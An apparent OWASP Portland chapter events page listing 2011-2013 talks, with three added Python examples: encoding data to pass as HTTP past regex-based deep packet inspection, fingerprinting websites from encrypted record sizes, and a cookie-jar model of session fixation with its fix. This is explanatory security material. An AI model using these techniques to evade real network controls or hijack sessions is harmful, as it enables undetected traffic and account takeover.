The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Website
Tuesday
Jul 2, 2013
OWASP Chapter Meeting
Portland State University Fourth Avenue Building (FAB)

Kevin P. Dyer presents:

P0wning DPI with Format-Transforming Encryption

Deep packet inspection (DPI) technologies provide much-needed visibility and control of network traffic using port-independent protocol identification (PIPI), where a network flow is labeled with its application-layer protocol based on packet contents. In many cases PIPI can be used for good. As one example, it allows network administrators to elevate the priority of time-sensitive (e.g., VoIP) data streams. In other cases PIPI can be used for harm: nation-states employ PIPI to block censorship circumvention tools such as Tor. There are many ways to perform PIPI; however, at the core of nearly all modern PIPI systems are regular expressions, an expressive tool to compactly specify sets of strings.

In this talk, Kevin reviews the state-of-the-art research on the capabilities of state-level DPI, then presents a novel cryptographic primitive called format-transforming encryption (FTE). An FTE scheme, intuitively, extends conventional symmetric encryption with the ability to transform the ciphertext into a user-defined format using regular expressions. An FTE-based record layer will be presented that can encrypt arbitrary TCP traffic and coerce modern DPI systems into misclassifying any data stream as a target protocol (e.g., HTTP, SMB, RSTP, etc.) of the user's choosing. What's more, this work is not only theoretical in nature: an open-source FTE prototype is publicly available and has had success in subverting modern DPI systems, including the Great Firewall of China.
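The core mechanism, mapping ciphertext bytes into strings of a regular language so that a regex-driven classifier labels the flow as the chosen protocol, can be shown end to end in a few dozen lines. The block below is an added example written for this listing, not the FTE prototype's code: it restricts the target language to fixed-length lowercase words embedded in an HTTP GET request (so ranking is base-26 arithmetic rather than the DFA ranking real FTE uses over arbitrary regular expressions), leaves the symmetric encryption step out (any bytes, for instance AES-CTR output, can be fed in), and uses a constructed DPI rule set and a placeholder Host name.

```python
"""Minimal format-transforming encoding into an HTTP-shaped regular language
(added, simplified example; not the talk's FTE implementation).
"""
import math
import re

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
BLOCK = 16                                                 # input bytes per word
WORD = math.ceil(BLOCK * 8 / math.log2(len(ALPHABET)))     # 28 letters: 26**28 > 2**128

# The format every output must match; a regex-based DPI engine reads it as HTTP.
HTTP_FORMAT = re.compile(
    r"GET (/[a-z]{%d})+ HTTP/1\.1\r\nHost: www\.example\.com\r\n\r\n" % WORD)

# Constructed PIPI rules of the kind the talk describes (not a real DPI product's).
DPI_RULES = {"http": re.compile(r"^(GET|POST) \S+ HTTP/1\.[01]\r\n"),
             "ssh": re.compile(r"^SSH-2\.0-")}


def unrank(n: int, length: int) -> str:
    """Map an integer to the n-th word of [a-z]{length} (big-endian base 26)."""
    out = []
    for _ in range(length):
        n, digit = divmod(n, len(ALPHABET))
        out.append(ALPHABET[digit])
    if n:
        raise ValueError("integer too large for the word length")
    return "".join(reversed(out))


def rank(word: str) -> int:
    """Inverse of unrank."""
    n = 0
    for ch in word:
        n = n * len(ALPHABET) + ALPHABET.index(ch)
    return n


def pad(data: bytes) -> bytes:
    """PKCS#7-style padding so the input splits into whole blocks."""
    k = BLOCK - len(data) % BLOCK
    return data + bytes([k]) * k


def unpad(data: bytes) -> bytes:
    k = data[-1]
    if not 1 <= k <= BLOCK or data[-k:] != bytes([k]) * k:
        raise ValueError("bad padding")
    return data[:-k]


def fte_encode(ciphertext: bytes) -> str:
    """Turn arbitrary bytes into a string that matches HTTP_FORMAT."""
    padded = pad(ciphertext)
    words = [unrank(int.from_bytes(padded[i:i + BLOCK], "big"), WORD)
             for i in range(0, len(padded), BLOCK)]
    return "GET /" + "/".join(words) + " HTTP/1.1\r\nHost: www.example.com\r\n\r\n"


def fte_decode(message: str) -> bytes:
    """Recover the bytes from a string produced by fte_encode."""
    if not HTTP_FORMAT.fullmatch(message):
        raise ValueError("message not in the expected format")
    path = message.split(" ")[1]
    try:
        blocks = [rank(w).to_bytes(BLOCK, "big") for w in path.strip("/").split("/")]
    except OverflowError as exc:
        raise ValueError("word outside the encodable range") from exc
    return unpad(b"".join(blocks))


def classify(stream: str) -> str:
    """Label a stream the way a regex-driven PIPI engine would."""
    for proto, rule in DPI_RULES.items():
        if rule.match(stream):
            return proto
    return "unknown"


if __name__ == "__main__":
    payload = bytes(range(40))          # stand-in for real ciphertext
    wire = fte_encode(payload)
    print(wire)
    print("DPI says:", classify(wire), "| roundtrip ok:", fte_decode(wire) == payload)
```

Because the output is chosen from the language of the regular expression rather than merely prefixed with a protocol banner, a classifier that matches on the whole request line still sees well-formed HTTP; the general construction in the talk does the same for any regular expression by ranking strings of its DFA.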

PSU is kindly providing coffee, tea, and cookies for us.


Kevin P. Dyer is a PhD student at Portland State University. His research focuses on building protocols that are resistant to traffic-analysis attacks and discriminatory routing policies. Previously, Kevin worked as a software engineer in telecommunications security, web security and network security. He holds an MSc in the Mathematics of Cryptography and Communications from Royal Holloway, University of London, and a BS in Computer Science and Mathematics from Santa Clara University.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list:

 https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Website
Thursday
Dec 13, 2012
OWASP Chapter Meeting
Collective Agency Downtown

Matthew Lapworth will present a talk on static code analysis.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.

Wednesday
Aug 22, 2012
OWASP Chapter Meeting
Portland State University Fourth Avenue Building (FAB)

Double Feature! For this chapter meeting, we have two protocol-oriented talks at PSU. Basic refreshments will be provided.

Kevin P. Dyer presents:
What Encryption Leaks and Why Traffic Analysis Countermeasures Fail

As more applications become web-based, an increasing number of client-server interactions are exposed to our networks and vulnerable to Traffic Analysis (TA) attacks. In one form, TA attacks exploit the lengths and timings of packets in a protocol's flow to infer sensitive information about communications. In the context of encrypted HTTP connections, such as HTTP over SSH, this means an adversary can determine which website a user is visiting. In the context of a specific web application, an adversary can determine user input by viewing only a few client-server interactions.

Recent advances in the application of Machine Learning tools demonstrate that TA attacks are possible despite industry-standard encryption such as TLS, SSH or IPSec. What is more, even if a protocol uses stronger countermeasures, such as fixed-length per-packet padding, this incurs significant overhead but only provides limited security benefit. These types of security vs. efficiency trade-offs are of immediate concern to security-aware applications such as Tor, and performance-sensitive application features such as Google Search Autocomplete.

In this talk, Kevin will address the state-of-the-art TA attacks and proposed countermeasures in the context of network and web application security. Most importantly, he will discuss open problems in this area and why a general-purpose TA countermeasure remains elusive.
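The two claims in the abstract, that encrypted traffic still identifies pages and that fixed-length padding costs a lot while hiding little, can be reproduced on a toy scale. The block below is an added example for this listing, not the speaker's experiments or data: the per-page record-size traces are constructed, the classifier is a nearest-neighbour match on (direction, size) counts rather than the machine-learning attacks the talk surveys, and the padding target of 1500 bytes is an assumption.

```python
"""Website fingerprinting from encrypted record sizes, before and after
fixed-length padding (added example with constructed traces, not the talk's data).
"""
from collections import Counter

# Constructed training traces: record sizes in bytes as an on-path observer
# sees them; positive = client to server, negative = server to client.
TRACES = {
    "login-page":   [+517, -1423, -1423, -610, +88, -1423, -312],
    "search-box":   [+523, -1423, -198, +94, -256, +96, -301],
    "help-article": [+511, -1423, -1423, -1423, -1423, -1423, -1423, -1423, -877],
}


def fingerprint(trace):
    """Features an attacker gets for free: multiset of (direction, size),
    record count, and total bytes. None of these are hidden by encryption."""
    sizes = Counter(("C2S" if n > 0 else "S2C", abs(n)) for n in trace)
    return sizes, len(trace), sum(abs(n) for n in trace)


def distance(a, b):
    """L1 distance over the size multiset, plus count and (scaled) volume terms."""
    sizes_a, count_a, total_a = a
    sizes_b, count_b, total_b = b
    keys = set(sizes_a) | set(sizes_b)
    return (sum(abs(sizes_a[k] - sizes_b[k]) for k in keys)
            + abs(count_a - count_b) + abs(total_a - total_b) / 1000)


def guess_page(observed, known):
    """Nearest-neighbour guess at which page produced the observed trace."""
    target = fingerprint(observed)
    return min(known, key=lambda name: distance(target, fingerprint(known[name])))


def pad_fixed(trace, size):
    """Countermeasure under test: pad every record up to `size`, keeping direction."""
    return [size if n > 0 else -size for n in trace]


def overhead(trace, size):
    """Extra bytes on the wire as a fraction of the unpadded volume."""
    original = sum(abs(n) for n in trace)
    return (len(trace) * size - original) / original


if __name__ == "__main__":
    # A fresh visit to the login page: same structure, sizes jittered by a few bytes.
    observed = [+519, -1423, -1423, -602, +90, -1423, -320]
    print("unpadded guess:", guess_page(observed, TRACES))
    padded_db = {name: pad_fixed(t, 1500) for name, t in TRACES.items()}
    print("padded guess:  ", guess_page(pad_fixed(observed, 1500), padded_db))
    for name, t in TRACES.items():
        print(f"{name:13s} padding overhead {overhead(t, 1500):.0%}")
```

After padding, the size multiset collapses to a single value, yet record count and the number of records in each direction still separate the three pages, so the attacker's guess does not change while the login page costs over 80% more bandwidth. That residual structure (counts, ordering, timing) is the reason the abstract says a general-purpose countermeasure remains out of reach.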

Timothy D. Morgan presents:
HTTPS, Cookies, and Men-in-the-Middle: Why You Shouldn't Allow Marketing Departments to Design Your Security Protocols

Login session management in modern web applications is largely dominated by use of HTTP cookies. However, HTTP cookies were never designed for secure applications, which has led to a significant number of protocol security problems.

In this talk, Tim will start with a brief background on why HTTP cookies are a poorly-conceived mechanism to begin with, and continue with a discussion of how this impacts security. He will describe several lesser-known cookie-based session management problems that remain widespread and allow for session hijacking through a variety of clever attacks.
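One of the design problems behind the talk's title is that a browser's cookie store keys cookies by name, domain and path only, not by the scheme they arrived on, so a man-in-the-middle who can answer a single plaintext HTTP request for the site can replace the session cookie the HTTPS site set. The block below is an added example for this listing, not the speaker's material: a small model of that RFC 6265 storage behaviour as browsers applied it at the time, with the later `__Host-` cookie-name prefix rule (Secure, no Domain attribute, Path=/, set from an https origin) modelled as the fix. Host names and cookie values are constructed, and the default-path rule is simplified to "/".

```python
"""Model cookie jar showing why scheme-blind cookie storage enables session
fixation by a network attacker (added example, not from the talk).
"""
from urllib.parse import urlsplit


class CookieJar:
    """Cookies are keyed by (name, domain, path); the originating scheme is not
    part of the key, exactly as RFC 6265 specifies."""

    def __init__(self, host_prefix_rule=False):
        self.store = {}
        self.host_prefix_rule = host_prefix_rule   # enforce __Host- semantics?

    def set_cookie(self, response_url, header):
        """Apply one Set-Cookie header from a response fetched at response_url.
        Returns False when the cookie is rejected."""
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        attrs = {}
        for part in parts[1:]:
            key, _, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip()
        url = urlsplit(response_url)
        domain = attrs.get("domain", url.hostname or "").lstrip(".").lower()
        path = attrs.get("path") or "/"            # default-path rule simplified
        secure = "secure" in attrs
        if self.host_prefix_rule and name.startswith("__Host-"):
            allowed = (secure and url.scheme == "https"
                       and "domain" not in attrs and path == "/")
            if not allowed:
                return False
        # Same key overwrites silently, even a Secure cookie set over https.
        self.store[(name, domain, path)] = {"value": value, "secure": secure,
                                            "httponly": "httponly" in attrs}
        return True

    def cookie_header(self, request_url):
        """Build the Cookie header a browser would attach to request_url."""
        url = urlsplit(request_url)
        host = (url.hostname or "").lower()
        sent = []
        for (name, domain, path), cookie in self.store.items():
            if host != domain and not host.endswith("." + domain):
                continue
            if not (url.path or "/").startswith(path):
                continue
            if cookie["secure"] and url.scheme != "https":
                continue                           # Secure: never over plaintext
            sent.append(f"{name}={cookie['value']}")
        return "; ".join(sent)


def fixation_demo(prefix_rule):
    """Legitimate https login, then a plaintext response forged by an attacker.
    Returns the session value the browser sends to the https site afterwards."""
    name = "__Host-session" if prefix_rule else "session"
    jar = CookieJar(host_prefix_rule=prefix_rule)
    jar.set_cookie("https://bank.example/login",
                   f"{name}=GOOD123; Secure; HttpOnly; Path=/")
    # Attacker on the network answers http://bank.example/ with its own cookie.
    jar.set_cookie("http://bank.example/", f"{name}=EVIL999; Secure; Path=/")
    return jar.cookie_header("https://bank.example/account")


if __name__ == "__main__":
    print("RFC 6265 store:    ", fixation_demo(prefix_rule=False))
    print("with __Host- rule: ", fixation_demo(prefix_rule=True))
```

The Secure attribute stops the good cookie from leaking over HTTP, but it says nothing about who may write to that slot; the prefix rule closes that gap by refusing any `__Host-` cookie that a non-https response tries to set, which is why an attacker's plaintext injection in the second run leaves the original session intact.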


Kevin P. Dyer is a PhD student at Portland State University. His research focuses on building protocols that are resistant to Traffic Analysis attacks. Prior to his academic life, Kevin worked as an engineer on various projects in telecommunications security, web security and network security. Kevin holds an MSc in the Mathematics of Cryptography and Communications from Royal Holloway, University of London, and a BS in Computer Science and Mathematics from Santa Clara University.

Timothy D. Morgan is a consultant at Virtual Security Research, LLC (VSR). As an application security specialist and digital forensics researcher, Tim has been taking deep technical dives in security for over a decade. Tim resides in Oregon and works at VSR where he helps to secure his customers' environments through penetration testing, training, and forensics investigations. His past security research has culminated in the release of several responsibly disclosed vulnerabilities in popular software products. Tim also develops and maintains several open source digital forensics tools which implement novel data recovery algorithms.


The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Meetings are free and open to the public.

Website
Monday
Jun 11, 2012
OWASP Chapter Meeting
Tiger Woods Center, Nike campus, Beaverton, OR

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.

This chapter meeting features guest speaker Kevin Johnson, a senior SANS instructor.

Website
Monday
Apr 23, 2012
OWASP Chapter Meeting
Collective Agency Downtown

Jim Manico has offered to come to Portland and do a presentation on Top 10 web coding defenses. Jim has many years of experience in the web application security space and currently works with WhiteHat Security & SANS.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.

Thursday
Mar 8, 2012
OWASP Chapter Meeting
Collective Agency Downtown

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

About Joe

This chapter meeting features guest speaker Joe Basirico, Director of Security Services at Security Innovation. Joe is responsible for managing the professional services business at Security Innovation. He leverages his unique experience as a development lead, trainer, researcher, and test engineer to lead the security engineering team in their delivery of high-quality, impactful assessment and remediation solutions to the company’s customers. His ability to blend his technical skills with risk-based contextual analysis and unwavering customer commitment makes him an invaluable asset for each Security Innovation client.

Joe is an active member in the security and open-source communities, having contributed technology, training, utilities, expertise and methodologies. He manages the company’s engineering blog and has written several publications that focus on vulnerabilities at the source code level. Joe holds a B.S. in Computer Science from Montana State University.

About the Talk - Thinking Like the Enemy

In this talk I will help you get into the Hacker's mindset from my ten years of experience as a penetration tester, assessing some of the most exciting applications in the world.

This talk will cover the most important qualities of a hacker or security tester, Top Vulnerabilities that you can't afford to miss as well as more difficult to tackle vulnerabilities that have caused tons of headaches and pain. By the end of the hour you'll better understand how to cause your application true pain, find a tiny weakness and cause the walls of security to crumble around it. After that we'll also talk about how to rebuild those walls to be more robust.

Website
Tuesday
Dec 13, 2011
OWASP Chapter Meeting
15300 SW Koll Parkway Beaverton, OR 97006

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software.

This informal chapter meeting will give attendees a chance to chat about whatever application security topics they are most interested in. Matthew will discuss the OWASP Testing Framework. Tim will offer his impressions of the Zed Attack Proxy. Other topics are welcome.

Website
Wednesday
Jun 5, 2013
OWASP Chapter Meeting - Jim Manico
Collective Agency Downtown

Jim Manico has offered to come and give us another great talk. Topic will either be "Top Ten Web Defenses" or "Securing the Software Development Lifecycle".

We will serve Pizza! Please RSVP by emailing {tim . morgan at owasp.org} so we can better estimate how much to order.

The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit worldwide charitable organization focused on improving the security of application software. To sign up for future meeting notes and to discuss security topics with local gurus, sign up on the OWASP Portland mailing list: https://lists.owasp.org/mailman/listinfo/owasp-portland

Chapter meetings are free and open to the public.